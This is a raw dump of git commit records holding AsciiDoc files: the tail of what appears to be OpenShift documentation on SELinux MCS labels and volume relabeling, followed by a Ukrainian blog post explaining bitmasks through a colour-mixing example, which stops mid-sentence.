MCS label are used interchangeably in this topic.\n====\n\n====\n----\n...\n securityContext: <1>\n seLinuxOptions:\n level: \"s0:c123,c456\" <2>\n...\n----\n<1> `*level*` can be defined globally for the entire pod, or individually for each\ncontainer.\n<2> SELinux level label.\n====\n\nHere are fragments from an SCC and from the *default* project:\n\n====\n----\n$ oc export scc scc-name\n...\nseLinuxContext:\n type: MustRunAs <1>\n\n# oc export project default\n...\nmetadata:\n annotations:\n openshift.io\/sa.scc.mcs: s0:c1,c0 <2>\n...\n----\n<1> *MustRunAs* causes volume relabeling.\n<2> If the label is not provided in the pod or in the SCC, then the default comes\nfrom the project.\n====\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. This forces pods to use MCS labels, which can be defined in the\npod definition, the image, or provided as a default.\n\nThe SCC determines whether or not to require an SELinux label and can provide a\ndefault label. If the `*seLinuxContext*` strategy is set to *MustRunAs* and the\npod (or image) does not define a label, {product-title} defaults to a label\nchosen from the SCC itself or from the project.\n\nIf `*seLinuxContext*` is set to *RunAsAny*, then no\ndefault labels are provided, and the container determines the final label. In\nthe case of Docker, the container will use a unique MCS label, which will not\nlikely match the labeling on existing storage mounts. Volumes which support\nSELinux management will be relabeled so that they are accessible by the\nspecified label and, depending on how exclusionary the label is, only that\nlabel.\n\nThis means two things for unprivileged containers:\n\n- The volume will be given a `*type*` which is accessible by unprivileged\ncontainers. This `*type*` is usually *svirt_sandbox_file_t*.\n- If a `*level*` is specified, the volume will be labeled with the given MCS\nlabel.\n\nFor a volume to be accessible by a pod, the pod must have both categories of the volume.\nSo a pod with *s0:c1,c2* will be able to access a volume with *s0:c1,c2*. A volume with\n*s0* will be accessible by all pods.\n\nIf pods fail authorization, or if the storage mount is failing due to\npermissions errors, then there is a possibility that SELinux enforcement is\ninterfering. One way to check for this is to run:\n\n----\n# ausearch -m avc --start recent\n----\n\nThis examines the log file for AVC (Access Vector Cache) errors.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f23eabfafc8316a281f87e0092d8b6d7772e01b","subject":"Update 2015-11-25-11-10-Bitmask-usage.adoc","message":"Update 2015-11-25-11-10-Bitmask-usage.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_contents":"= 1+1 = 10. Bitmask usage\n:hp-image: cover_lines.jpg\n:hp-tags: bitmask\n\n\u0426\u0456\u043a\u0430\u0432\u043e, \u043d\u0430\u0441\u043a\u0456\u043b\u044c\u043a\u0438 \u0440\u043e\u0437\u043f\u043e\u0432\u0441\u044e\u0434\u0436\u0435\u043d\u0435 \u0437\u0430\u0440\u0430\u0437, \u0432 \u0447\u0430\u0441 \"\u043f\u0430\u043d\u0443\u0432\u0430\u043d\u043d\u044f\" \u0432\u0438\u0441\u043e\u043a\u043e\u0440\u0456\u0432\u043d\u0435\u0432\u0438\u0445 \u043c\u043e\u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443\u0432\u0430\u043d\u043d\u044f \u0442\u0430 \u0432\u0435\u043b\u0438\u043a\u0438\u0445 \u043e\u0431\"\u0454\u043c\u0456\u0432 \u043f\u0430\u043c\"\u044f\u0442\u0456, \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u0430\u043d\u043d\u044f \u043f\u043e\u0431\u0456\u0442\u043e\u0432\u0438\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u0439 (bitwise) \u0442\u0430 \u0431\u0456\u0442\u043e\u0432\u0438\u0445 \u043c\u0430\u0441\u043e\u043a (bitmask)? \u041c\u0435\u043d\u0456 \u0447\u043e\u043c\u0443\u0441\u044c \u0437\u0434\u0430\u0432\u0430\u043b\u043e\u0441\u044c, \u0449\u043e \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0441\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044f \u043c\u043e\u0436\u0435 \u0431\u0443\u0442\u0438 \u043a\u043e\u0440\u0438\u0441\u043d\u043e\u044e \u0434\u043b\u044f \u0442\u0438\u0445, \u0445\u0442\u043e \u0437\u0430\u0439\u043c\u0430\u0454\u0442\u044c\u0441\u044f \u043d\u0438\u0437\u044c\u043a\u043e-\u0440\u0456\u0432\u043d\u0435\u0432\u0438\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443\u0432\u0430\u043d\u043d\u044f\u043c (\u043d\u0456\u043a\u043e\u043b\u0438 \u043d\u0435 \u0437\u0443\u0441\u0442\u0440\u0456\u0447\u0430\u043b\u0430 \u0442\u0430\u043a\u0438\u0445 \u043b\u044e\u0434\u0435\u0439, \u0430\u043b\u0435 \u0441\u043f\u043e\u0434\u0456\u0432\u0430\u044e\u0441\u044c, \u0449\u043e \u0432\u043e\u043d\u0438 \u0456\u0441\u043d\u0443\u044e\u0442\u044c), \u043d\u0443 \u0430\u0431\u043e \u0434\u043b\u044f \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044f \u044f\u043a\u043e\u0433\u043e\u0441\u044c \u0445\u0438\u0442\u0440\u043e\u0433\u043e \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0437\u0431\u0435\u0440\u0456\u0433\u0430\u044e\u0447\u043e\u0433\u043e \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0443 (\u043b\u044e\u0434\u0435\u0439, \u0449\u043e \u0437\u0430\u0439\u043c\u0430\u044e\u0442\u044c\u0441\u044f \u0442\u0430\u043a\u0438\u043c\u0438 \u0440\u0435\u0447\u0430\u043c\u0438 \u0434\u043b\u044f \u0440\u043e\u0431\u043e\u0442\u0438, \u0430 \u043d\u0435 \u0434\u043b\u044f \u0445\u043e\u0431\u0456, \u044f \u0442\u0435\u0436, \u043d\u0430\u0436\u0430\u043b\u044c, \u043d\u0435 \u0437\u0443\u0441\u0442\u0440\u0456\u0447\u0430\u043b\u0430). \u042f\u043a\u0438\u043c \u0436\u0435 \u0431\u0443\u043b\u043e \u043c\u043e\u0454 \u0437\u0434\u0438\u0432\u0443\u0432\u0430\u043d\u043d\u044f, \u043a\u043e\u043b\u0438 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c\u0443 \u043f\u0440\u043e\u0435\u043a\u0442\u0456 \u044f \u043f\u043e\u0431\u0430\u0447\u0438\u043b\u0430 \u0432 \u043a\u043e\u0434\u0456 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u044e \u043d\u0430 \u0437\u0440\u0430\u0437\u043e\u043a \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u043e\u0457: +\n\n\tif (Request.PermissionMask & (8) > 0)\n\t\t{...}\n\n\u041d\u0435\u0432\u0436\u0435! \u041d\u0435\u0432\u0436\u0435 \u0448\u043a\u0456\u043b\u044c\u043d\u0456 \u0437\u043d\u0430\u043d\u043d\u044f \u0437 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u043e\u0457 \u0441\u0438\u0441\u0442\u0435\u043c\u0438 \u0441\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044f \u0441\u0442\u0430\u043d\u0443\u0442\u044c \u0432 \u043d\u0430\u0433\u043e\u0434\u0456 \u0434\u043b\u044f \u0440\u043e\u0431\u043e\u0442\u0438! \u042f\u043a \u0432\u0438\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u043f\u0456\u0437\u043d\u0456\u0448\u0435, \u043d\u0430 \u0434\u0432\u043e\u0445 \u043c\u043e\u0457\u0445 \u043c\u0438\u043d\u0443\u043b\u0438\u0445 \u0437\u0432\u0438\u0447\u0430\u0439\u043d\u0456\u0441\u0456\u043d\u044c\u043a\u0438\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u0438\u0445 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445 \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u043e\u0432\u0443\u0432\u0430\u043b\u0438\u0441\u044c \u0431\u0456\u0442\u043e\u0432\u0456 \u043c\u0430\u0441\u043a\u0438. \u041e\u0434\u043d\u0438\u043c \u0437 \u043d\u0438\u0445 \u0431\u0443\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0430 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0430 \u0440\u043e\u043a\u0456\u0432 \u0442\u0430\u043a 15 \u043d\u0430\u0437\u0430\u0434 (\u043d\u0443 \u0442\u0443\u0442 \u043c\u043e\u0436\u043d\u0430 \u0437\u0440\u043e\u0437\u0443\u043c\u0456\u0442\u0438, \u043c\u043e\u0436\u0435 \u043d\u0430 \u0447\u0430\u0441 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044f \u043d\u0435 \u0431\u0443\u043b\u043e \u0456\u043d\u0448\u0438\u0445 \u0432\u0430\u0440\u0456\u0430\u043d\u0442\u0456\u0432 \u043f\u0440\u043e\u0441\u0442\u043e \u0456 \u0442\u0430\u043c \u043d\u0456\u0445\u0442\u043e \u043d\u0435 \u0434\u0443\u043c\u0430\u0432 \u043f\u0440\u043e \u0442\u0435, \u0449\u043e \u043a\u043e\u0434 \u043c\u0430\u0454 \u0431\u0443\u0442\u0438 \u0437\u0440\u043e\u0437\u0443\u043c\u0456\u043b\u0438\u043c \u0456 self-descriptive), \u0430\u043b\u0435 \u0456\u043d\u0448\u0438\u0439 \u043f\u0440\u043e\u0435\u043a\u0442 \u0431\u0443\u0432 \u0432\u0456\u0434\u043d\u043e\u0441\u043d\u043e \u043d\u043e\u0432\u0438\u043c. \u041d\u0456 \u0432 \u0442\u043e\u043c\u0443, \u043d\u0456 \u0432 \u0456\u043d\u0448\u043e\u043c\u0443 \u0432\u0438\u043f\u0430\u0434\u043a\u0443 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0438 \u0435\u043a\u043e\u043d\u043e\u043c\u0456\u0457 \u043f\u0430\u043c\"\u044f\u0442\u0456 \u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0438 \u043e\u0431\u0440\u043e\u0431\u043a\u0438 \u0432\u0435\u043b\u0438\u043a\u0438\u0445 \u043e\u0431\"\u0454\u043c\u0456\u0432 \u0434\u0430\u043d\u0438\u0445 \u043d\u0435 \u0431\u0443\u043b\u043e. \n\n== Bitmask\n\n\u0421\u043f\u0440\u043e\u0431\u0443\u044e \u043f\u043e\u044f\u0441\u043d\u0438\u0442\u0438 \u0441\u0432\u043e\u0454 \u0437\u0434\u0438\u0432\u0443\u0432\u0430\u043d\u043d\u044f. \u0421\u043f\u043e\u0447\u0430\u0442\u043a\u0443 \u0440\u043e\u0437\u043f\u043e\u0432\u0456\u043c, \u0449\u043e \u0442\u0430\u043a\u0435 \u0431\u0456\u0442\u043e\u0432\u0430 \u043c\u0430\u0441\u043a\u0430. Bitmask - \u0446\u0435 \u0441\u043f\u043e\u0441\u0456\u0431 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a\u0438 \u043e\u0431\"\u0454\u043a\u0442\u0443 \u0437\u0430 \u0434\u043e\u043f\u043e\u043c\u043e\u0433\u043e\u044e \u0446\u0438\u0444\u0440 0 \u0442\u0430 1 (\u043d\u0443, \u0442\u043e\u043c\u0443 \u0449\u043e \u0446\u0435 *\u0431\u0456\u0442\u043e\u0432\u0430* \u043c\u0430\u0441\u043a\u0430). \u041c\u043e\u0436\u043d\u0430 \u0434\u0443\u043c\u0430\u0442\u0438 \u043f\u0440\u043e \u0431\u0456\u0442\u043e\u0432\u0443 \u043c\u0430\u0441\u043a\u0443 \u044f\u043a \u043f\u0440\u043e \u0448\u0438\u0444\u0440: +\n\n- \u041a\u043e\u0436\u043d\u0430 \u0446\u0438\u0444\u0440\u0430 \u0432 \u0447\u0438\u0441\u043b\u0456 \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u0430\u0454 \u0437\u0430 \u0437\u0430\u0437\u0434\u0430\u043b\u0435\u0433\u0456\u0434\u044c \u0432\u0438\u0437\u043d\u0430\u0447\u0435\u043d\u0443 \u0432\u043b\u0430\u0441\u0442\u0438\u0432\u0456\u0441\u0442\u044c; \n- 0 \u043c\u043e\u0436\u0435 \u0437\u043d\u0430\u0447\u0438\u0442\u0438, \u043d\u0430\u043f\u0440\u0438\u043a\u043b\u0430\u0434, \u0449\u043e \u043f\u0435\u0432\u043d\u0430 \u0432\u043b\u0430\u0441\u0442\u0438\u0432\u0456\u0441\u0442\u044c \u0432 \u043e\u0431\"\u0454\u043a\u0442\u0456 \u0432\u0456\u0434\u0441\u0443\u0442\u043d\u044f, \u0430 1 - \u0449\u043e \u043f\u0440\u0438\u0441\u0443\u0442\u043d\u044f.\n\n\u0414\u043b\u044f \u043a\u0440\u0430\u0449\u043e\u0433\u043e \u0440\u043e\u0437\u0443\u043c\u0456\u043d\u043d\u044f, \u0441\u0442\u0432\u043e\u0440\u0438\u043c\u043e \u0431\u0456\u0442\u043e\u0432\u0456 \u043c\u0430\u0441\u043a\u0438 \u0434\u043b\u044f \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432. \u0404 \u0442\u0440\u0438 \u0431\u0430\u0437\u043e\u0432\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 - \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439, \u0436\u043e\u0432\u0442\u0438\u0439 \u0442\u0430 \u0441\u0438\u043d\u0456\u0439. \u0417\u043c\u0456\u0448\u0443\u044e\u0447\u0438 \u0446\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 \u043c\u0438 \u043c\u043e\u0436\u0435\u043c\u043e \u043e\u0442\u0440\u0438\u043c\u0430\u0442\u0438 \u0432\u0441\u0456 \u0456\u043d\u0448\u0456 (\u044f \u0442\u0443\u0442 \u043c\u0430\u044e \u043d\u0430 \u0443\u0432\u0430\u0437\u0456 \u0431\u0430\u0437\u043e\u0432\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 \u0434\u043b\u044f \u0445\u0443\u0434\u043e\u0436\u043d\u0438\u043a\u0456\u0432, \u0436\u0438\u0432\u0438\u0445 \u043b\u044e\u0434\u0435\u0439, \u0430 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044f \u043a\u043e\u043b\u044c\u043e\u0440\u0443 \u0432 \u043a\u043e\u043c\u043f\"\u044e\u0442\u0435\u0440\u0430\u0445). \n\n|===\n|\u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439|\u0416\u043e\u0432\u0442\u0438\u0439|\u0421\u0438\u043d\u0456\u0439| \n|0|0|1| \u0421\u0438\u043d\u0456\u0439\n|0|1|0| \u0416\u043e\u0432\u0442\u0438\u0439\n|1|0|0| \u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n|0|1|1| \u0417\u0435\u043b\u0435\u043d\u0438\u0439\n|1|1|0| \u041f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n|1|0|1| \u0424\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n|===\n\n\n\u041e\u0442\u0440\u0438\u043c\u0430\u043b\u0438 \u0442\u0430\u043a\u0456 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0456 \u043a\u043e\u0434\u0438: +\n\n\t1 - \u0441\u0438\u043d\u0456\u0439\n 10 - \u0436\u043e\u0432\u0442\u0438\u0439\n 100 - \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n 11 - \u0437\u0435\u043b\u0435\u043d\u0438\u0439\n 110 - \u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n 101 - \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n\n\u0417\u0430\u0437\u0432\u0438\u0447\u0430\u0439, \u044f\u043a\u0449\u043e \u0432\u0438\u0440\u0456\u0448\u0443\u044e\u0442\u044c \u043a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0442\u0438\u0441\u044c \u0431\u0456\u0442\u043e\u0432\u0438\u043c\u0438 \u043c\u0430\u0441\u043a\u0430\u043c\u0438, \u0442\u043e \u0442\u0430\u043a\u0456 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0456 \u043a\u043e\u0434\u0438 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u044f\u0442\u044c \u0432 \u0437\u0432\u0438\u0447\u043d\u0443 \u0434\u043b\u044f \u043d\u0430\u0441 \u0434\u0435\u0441\u044f\u0442\u043a\u043e\u0432\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0441\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044f:\n\n\n|===\n||2|1|0|\n|\u0441\u0438\u043d\u0456\u0439|0|0|1|1 * 2^0^ = 1\n|\u0436\u043e\u0432\u0442\u0438\u0439|0|1|0| 1 * 2^1^ = 2\n|\u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439|1|0|0| 1 * 2^2^ = 4\n|\u0437\u0435\u043b\u0435\u043d\u0438\u0439|0|1|1| 1 * 2^0^ + 1 * 2^1^ = 3\n|\u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439|1|1|0| 1 * 2^1^ + 1 * 2^2^ = 6\n|\u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439|1|0|1| 1 * 2^0^ + 1 * 2^2^ = 5\n|===\n\n\u0422\u0435\u043f\u0435\u0440, \u043a\u043e\u0434\u0438 \u0434\u043e \u043d\u0430\u0448\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432 \u0432\u0438\u0433\u043b\u044f\u0434\u0430\u044e\u0442\u044c \u0442\u0430\u043a:\n\n\t1 - \u0441\u0438\u043d\u0456\u0439\n 2 - \u0436\u043e\u0432\u0442\u0438\u0439\n 4 - \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n 3 - \u0437\u0435\u043b\u0435\u043d\u0438\u0439\n 6 - \u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n 5 - \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n\n\u042f\u043a\u0449\u043e \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0456\u0437\u0443\u0432\u0430\u0442\u0438, \u0442\u043e \u043f\u043e\u0431\u0430\u0447\u0438\u043c\u043e, \u0449\u043e \u0432\u0441\u0456 \u0431\u0430\u0437\u043e\u0432\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 \u0454 \u0441\u0442\u0435\u043f\u0435\u043d\u044f\u043c\u0438 2, \u0432\u0441\u0456 \u0456\u043d\u0448\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438, \u0449\u043e \u043c\u0438 \u043e\u0442\u0440\u0438\u043c\u0430\u043b\u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0456 \u0437\u043c\u0456\u0448\u0443\u0432\u0430\u043d\u043d\u044f \u0454 \u0441\u0443\u043c\u043e\u044e \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u043d\u0438\u0445 \u0431\u0430\u0437\u043e\u0432\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432, \u0442\u0430\u043a \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439 = \u0441\u0438\u043d\u0456\u0439 + \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439: +\n\n\t5 = 1 + 4 \n\n\u041e\u043a\u0440\u0456\u043c \u0446\u0438\u0445 \u0432\u043b\u0430\u0441\u0442\u0438\u0432\u043e\u0441\u0442\u0435\u0439, \u0449\u0435 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0430\u0445, \u0442\u0430\u043a\u0456 \"\u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0456\" \u043e\u0431\"\u0454\u043a\u0442\u0438 \u0440\u043e\u0437\u0448\u0438\u0444\u0440\u043e\u0432\u0443\u044e\u0442\u044c\u0441\u044f \u0431\u0456\u0442\u043e\u0432\u0438\u043c\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u044f\u043c\u0438 (bitwise), \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c\u0443 \u043e\u043f\u0435\u0440\u0430\u043d\u0434\u043e\u043c & (AND). \u0422\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043a\u043b\u0430\u0434, \u044f\u043a\u0449\u043e \u043d\u0430\u043c \u043f\u043e\u0442\u0440\u0456\u0431\u043d\u043e \u0432\u0438\u0431\u0440\u0430\u0442\u0438 \u0441\u0435\u0440\u0435\u0434 \u0432\u0441\u0456\u0454\u0457 \u043c\u043d\u043e\u0436\u0438\u043d\u0438 \u043d\u0430\u0448\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432 \u0442\u0456\u043b\u044c\u043a\u0438 \u0442\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438, \u0434\u0435 \u0431\u0443\u0432 \u0437\u0430\u0441\u0442\u043e\u0441\u043e\u0432\u0430\u043d\u0438\u0439 \u0441\u0438\u043d\u0456\u0439 \u043a\u043e\u043b\u0456\u0440, \u0442\u043e \u043c\u0438 \u0432\u0438\u043a\u043e\u043d\u0430\u0454\u043c\u043e \u0442\u0430\u043a\u0443 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u044e:\n\n\tcolor = {1, 2, 4, 3, 6, 5} - \u043d\u0430\u0448\u0430 \u043c\u043d\u043e\u0436\u0438\u043d\u0430 \u0432\u0441\u0456\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432\n\tcolor & 1 > 0 = {1, 3, 5} - \u043c\u043d\u043e\u0436\u0438\u043d\u0430 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432, \u0432 \u044f\u043a\u0438\u0445 \u0454 \u0441\u0438\u043d\u0456\u0439 \u043a\u043e\u043b\u0456\u0440 (\u0441\u0438\u043d\u0456\u0439, \u0437\u0435\u043b\u0435\u043d\u0438\u0439, \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439)\n \n\u041e\u043f\u0438\u0448\u0443 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u0456\u0448\u0435, \u044f\u043a \u043c\u0438 \u0446\u0435 \u043e\u0442\u0440\u0438\u043c\u0430\u043b\u0438:\n\n\u041c\u0438 \u0437\u0430\u0441\u0442\u043e\u0441\u043e\u0432\u0443\u0454\u043c\u043e \u043b\u043e\u0433\u0456\u0447\u043d\u0435 AND \u0434\u043e \u043a\u043e\u0436\u043d\u043e\u0457 \u043f\u0430\u0440\u0438 \u0431\u0456\u0442\u0456\u0432, \u044f\u043a\u0456 \u0441\u0442\u043e\u044f\u0442\u044c \u043d\u0430 \u043e\u0434\u043d\u0430\u043a\u043e\u0432\u0438\u0445 \u043f\u043e\u0437\u0438\u0446\u0456\u044f\u0445 \u0443 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0438\u0445 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044f\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432. \u042f\u043a\u0449\u043e \u043e\u0431\u0438\u0434\u0432\u0430 \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u043d\u0438\u0445 \u0431\u0456\u0442\u0430 \u0440\u0456\u0432\u043d\u0456 1, \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0443\u044e\u0447\u0438\u0439 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0438\u0439 \u0440\u043e\u0437\u0440\u044f\u0434 \u0434\u043e\u0440\u0456\u0432\u043d\u044e\u0454 1 (true), \u044f\u043a\u0449\u043e \u0436 \u0445\u043e\u0447\u0430 \u0431 \u043e\u0434\u0438\u043d \u0431\u0456\u0442 \u0437 \u043f\u0430\u0440\u0438 \u0434\u043e\u0440\u0456\u0432\u043d\u044e\u0454 0, \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0443\u044e\u0447\u0438\u0439 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0438\u0439 \u0440\u043e\u0437\u0440\u044f\u0434 \u0434\u043e\u0440\u0456\u0432\u043d\u044e\u0454 0 (false).\n\n|=== \n|0|0|#1#| \u0421\u0438\u043d\u0456\u0439\n|0|1|0| \u0416\u043e\u0432\u0442\u0438\u0439\n|1|0|0| \u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n|0|1|#1#| \u0417\u0435\u043b\u0435\u043d\u0438\u0439\n|1|1|0| \u041f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n|1|0|#1#| \u0424\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n|===\n***\n|===\n|0|0|#1#| \u0421\u0438\u043d\u0456\u0439\n|===\n***\n|=== \n|0|0|*1*| \u0421\u0438\u043d\u0456\u0439\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*\u0416\u043e\u0432\u0442\u0438\u0439*\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*\u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439*\n|0|0|*1*| \u0417\u0435\u043b\u0435\u043d\u0438\u0439\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*\u041f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439*\n|0|0|*1*| \u0424\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n|===\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u0457 AND \u0434\u043b\u044f \u0436\u043e\u0432\u0442\u043e\u0433\u043e, \u0447\u0435\u0440\u0432\u043e\u043d\u043e\u0433\u043e \u0442\u0430 \u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u043e\u0433\u043e \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432 \u043e\u0434\u043d\u0430\u043a\u043e\u0432\u0438\u0439 - 000, \u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u044c \u0432\u043e\u043d\u0438 \u043d\u0435 \u0432\u0432\u0456\u0439\u0448\u043b\u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0443\u044e\u0447\u0438\u0439 \u043d\u0430\u0431\u0456\u0440.\n\n\u042f\u043a \u0431\u0430\u0447\u0438\u0442\u0435, \u0437\u0430\u0441\u0442\u043e\u0441\u0443\u0432\u0430\u043d\u043d\u044f \u0431\u0456\u0442\u043e\u0432\u0438\u0445 \u043c\u0430\u0441\u043e\u043a \u0454 \u0446\u0456\u043a\u0430\u0432\u0438\u043c \u0442\u0430 \u0434\u0430\u0454 \u043d\u0430\u043c \u043c\u043e\u0436\u043b\u0438\u0432\u0456\u0441\u0442\u044c \u0432 \u043e\u0434\u043d\u043e\u043c\u0443 \u0447\u0438\u0441\u043b\u0456 \u0437\u0431\u0435\u0440\u0456\u0433\u0430\u0442\u0438 \u0431\u0430\u0433\u0430\u0442\u043e \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u0457 - \u043f\u043e \u043e\u0434\u043d\u043e\u043c\u0443 \u0431\u0456\u0442\u0443 \u043d\u0430 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a\u0443 \u043e\u0431\"\u0454\u043a\u0442\u0430. \u0410\u043b\u0435, \u0446\u0435 \u043d\u0435 \u0440\u043e\u0431\u0438\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443 \u043b\u0435\u0433\u043a\u043e\u044e \u0434\u043b\u044f \u0440\u043e\u0437\u0443\u043c\u0456\u043d\u043d\u044f \u0442\u0430 \u043f\u043e\u0434\u0430\u043b\u044c\u0448\u043e\u0457 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u043a\u0438, \u043e\u0441\u043e\u0431\u043b\u0438\u0432\u043e, \u044f\u043a\u0449\u043e \u0440\u043e\u0437\u0440\u043e\u0431\u043d\u0438\u043a \u043d\u0435 \u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0443\u0432\u0430\u0432 \u0441\u0432\u0456\u0439 \u0448\u0438\u0444\u0440 =) \n\n\u041d\u0430 \u0441\u044c\u043e\u0433\u043e\u0434\u043d\u0456 \u0432\u0441\u0435, \u0430 \u0432 \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u043e\u043c\u0443 \u043f\u043e\u0441\u0442\u0456 \u044f \u0440\u043e\u0437\u043f\u043e\u0432\u0456\u043c \u043f\u0440\u043e \u0442\u0435, \u044f\u043a \u043c\u043e\u0436\u043d\u0430 \u0443\u0434\u043e\u0441\u043a\u043e\u043d\u0430\u043b\u0438\u0442\u0438 \u0440\u0456\u0448\u0435\u043d\u043d\u044f, \u044f\u043a\u0449\u043e \u0432\u0438, \u0432\u0441\u0435 \u0436 \u0442\u0430\u043a\u0438, 